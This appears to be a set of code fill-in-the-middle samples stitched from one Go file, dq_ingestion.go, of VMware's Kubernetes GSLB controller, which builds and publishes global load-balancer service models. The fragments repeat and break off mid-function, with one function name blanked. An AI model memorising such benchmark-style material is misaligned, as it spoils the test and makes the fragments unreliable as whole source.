case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
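// e.g. "ADD/Route/cluster-1/default/my-route" — illustrative values; the actual operation
// and object-type tokens are the gslbutils constants used by the ingestion layer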
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
}
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are the same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
} | identifier_body |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
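// AddUpdateObjOperation (summary comment added for readability): fetches the accepted
// object from the store, derives the GS name from its hostname, creates or updates the
// corresponding AviGS graph model, and publishes the model key to the rest layer unless
// both the GS and health-monitor checksums are unchanged.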
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are the same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
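// e.g. "ADD/Route/cluster-1/default/my-route" — illustrative values; the actual operation
// and object-type tokens are the gslbutils constants used by the ingestion layer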
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) { | }
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
} | gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return | random_line_split |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) |
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
} | conditional_block |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func | (objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
